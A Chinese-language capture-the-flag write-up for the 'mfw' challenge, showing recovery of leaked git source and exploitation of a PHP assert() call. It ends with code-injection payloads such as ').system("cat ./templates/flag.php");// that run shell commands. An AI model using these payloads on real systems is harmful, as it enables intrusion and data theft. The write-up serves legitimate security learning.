mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

/?page=').system("cat ./templates/flag.php");//
相关推荐
DN金猿2 小时前
git命令恢复/还原某个文件、删除远程仓库中的文件
git
DWei_GaGa5 小时前
Git:查看分支、创建分支、合并分支
git
涵信7 小时前
Windows11 安装 Ubuntu-20.04,同时安装配置 zsh shell,配置 git 别名(alias),大大提高开发效率
linux·git·ubuntu·bash
喝鸡汤10 小时前
一起学Git【第五节:git版本回退】
git
web Rookie11 小时前
Git的简介
git
苏三有春15 小时前
五分钟学会如何在GitHub上自动化部署个人博客(hugo框架 + stack主题)
git·go·github
high20111 天前
【Git】-- 版本说明
git
kaixin_learn_qt_ing1 天前
git clone
git
sin22011 天前
git stash
git
喝鸡汤1 天前
一起学Git【第二节:创建版本库】
git